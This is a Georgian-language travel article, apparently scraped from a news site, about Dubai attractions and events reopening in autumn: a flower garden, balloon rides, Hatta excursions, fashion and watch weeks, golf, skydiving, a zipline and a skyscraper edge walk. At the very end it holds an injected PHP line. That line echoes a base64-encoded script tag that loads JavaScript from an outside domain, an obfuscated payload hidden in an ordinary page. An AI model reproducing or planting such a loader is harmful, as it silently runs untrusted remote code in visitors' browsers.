celsiusi
ავერსი საქკაბელი

ზაფხულის არდადეგების შემდეგ,  დუბაიში ყველა ის  ატრაქციონი, პარკი და თვალწარმტაცი გადმოსახედი ადგილი გაიხსნა, რომლებიც თვეების მანძილზე დამთვალიერებლებისთვის დახურული იყო.

15 სექტემბრიდან დუბაის საოცრებათა ბაღი კიდევ ერთხელ გაცოცხლდება  - მსოფლიოში უდიდესი ყვავილების ბაღი, სადაც 50 მილიონი დარგული ყვავილისგან მსოფლიოში ცნობილი არქიტექტურული ძეგლების ზუსტი ასლებია შექმნილი. ბაღში გულის ფორმის თაღებით მორთული სიყვარულის ხეივანიც არის, რომელიც შეყვარებული წყვილებისთვის განსაკუთრებით მიმზიდველია. 

16 სექტემბრიდან  ბევრისთვის საყვარელი გართობა - Hot Air Balooon ბრუნდება.  საჰაერო ბურთების საშუალებით მოგზაურებს არაბეთის უსაზღვრო კუნძულებზე ასვლა შეეძლებათ და  1200 მეტრის სიმაღლიდან დაინახავენ ქვიშის უსასრულო დიუნების პანორამული ხედებს, მოხდენილი გაზელებს და ჰაჯარის  დიდებულ მთებს.

Large DTCM D01S01 Balloon C320 min

საექსკურსიო პროგრამები განახლდება ჰატაში, რომელიც მთის მომხიბლავი პეიზაჟებითაა განთქმული. ეს პატარა ქალაქი ძველად სამხედრო ციხე-სიმაგრითა და მცირე ფერმერობით იყოს ცნობილი, დღეს კი ის  როგორც ლამაზი ბუნების, ისე აქტიური დასვენების მოყვარულებს ერთნაირად იზიდავს. ტურისტებს შორის განსაკუთრებული პოპულარობით სარგებლობს ველოსიპედით სეირნობა სხვადასხვა სირთულის მარშრუტებზე, კაიაკით სეირნობა ჰატას  ტბის კაშხალზე და ცხენებით გასეირნება მთის  მომაჯადოებელი პეიზაჟების ფონზე.

შემოდგომა დუბაიში ფესტივალებისა და გამოფენების სიმდიდრითაც იქნება გამორჩეული. 10-დან 15 ოქტომბრამდე დუბაი არაბული მოდის კვირეულს Dubai Fashion Week (DFW) მასპინძლობს,  რომელიც მოდის საერთაშორისო კვირეულების ხუთეულში შედის, ნიუ-იორკის, ლონდონის, მილანისა და პარიზის მოდის კვირეულებთან ერთად.

 16-დან 19 ნოემბრამდე, დუბაიში მოუთმენლად ელიან გოლფის მსოფლიო ჩემპიონატს Dubai Desert Classic & DP World Tour Championship, რომელიც გოლფის მსოფლიოში საუკეთესო მოთამაშეებს მოუყრის თავს.  სპორტის ამ სახეობის მოყვარულებს შეეძლებათ ტურნირებს თვალი ადევნონ გოლფის შესანიშნავ მოედნებზე: Emirates Golf Club, Dubai Creek Golf & Yacht Club და Jumeirah Golf Estates.

Omega Dubai Desert Classic 1 min

16-დან 20 ნოემბრის ჩათვლით ქალაქი მასპინძლობს გამოფენას Dubai Watch Week,  რომლის ფარგლებშიც ბიზნესმენებს, ექსპერტებსა და მონაწილეებს შესაძლებლობა ექნებათ გაცვალონ ცოდნა, დაამყარონ საქმიანი კავშირები და გახდნენ პარტნიორები. გამოფენაზე ისეთ მოწინავე ბრენდების წარმომადგენლებს ელიან, როგორებიცაა Bvlgari, Akrivia, Audemars Piguet, MB&F, TAG Heuer, Breitling, Greubel Forsey, Ulysse Nardin, Montblanc და სხვ.

მძაფრი შეგრძნებების მოყვარულებს  დუბაი შემოდგომაზე - „ფრენის“ დაუვიწყარ შეგრძნებებს „სქაიდაივინგს“ შესთავაზებს.  მსურველებს შეეძლებათ პარაშუტით გადმოხტნენ  პალმ ჯუმეირას კუნძულზე ან  არაბეთის უკიდეგანო უდაბნოზე. მათ, ვისაც წინა გამოცდილება აქვთ, შეეძლებათ  სოლო ან ტანდემში ხტომები სცადონ. აბსოლუტურ დამწყებები კი  ბორტზე ასვლამდე გამოცდილი ინსტრუქტორებისგან სათანადოდ მომზადდებიან.

Skydive Dubai 3 min

დუბაი მარინას რაიონში მსურველებს ყველაზე გრძელ ურბანულ ზიპლაინზე შეეძლებათ გასეირნება, რომელიც ასევე უსწრაფესადაა მიჩნეული.  ქალაქის ცათამბჯენებით გარშემორტყმული და იახტებით შემოსაზღვრული 1 კილომეტრიანი ბილიკის გავლისას შესაძლოა 80 კმ/სთ სიჩქარესაც  კი  მიაღწიოთ.

Large DET Dubai Marina Always On 5 min

ყველაზე გაბედულებს საკუთარი თავის გამოცდა  ცათამბჯენის კიდეზე Edge Walk გასეირნებისას შეეძლებათ. ეს ატრაქციონი დუბაის ცენტრში, Address Sky View Hotel-ის სახურავზე მდებარეობს, რომლის სიმაღლე 219 მეტრია. ამ თავგადასავლის გარდა შესაძლებელია  ორდონიანი გადმოსახედი ადგილი - ცის ობსერვატორიის დათვალიერება.  46-მეტრიან შუშის ხიდზე გავლა, რომელიც სასტუმროს 2 კოშკს აკავშირებს და 53-ე სართულიდან ქვემოთ ჩამოსვლა, ქალაქის პანორამული ხედების ფონზე.

საამიროს გასაცნობად შემოდგომა შესანიშნავი დროა.  უდაბნოს საოცარი თავგადასავლებითა თუ ცათამბჯენებით დაწყებული, გასტრონომიული შთაბეჭდილებებითა და გლობალური ბრენდების მოდის ჩვენების ჩათვლით,  დუბაი ამ შემოდგომაზე ტურისტებს საინტერესო და დაუვიწყარ მოგზაურობას ჰპირდება.

Large DJI 0667 Pano min

754
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");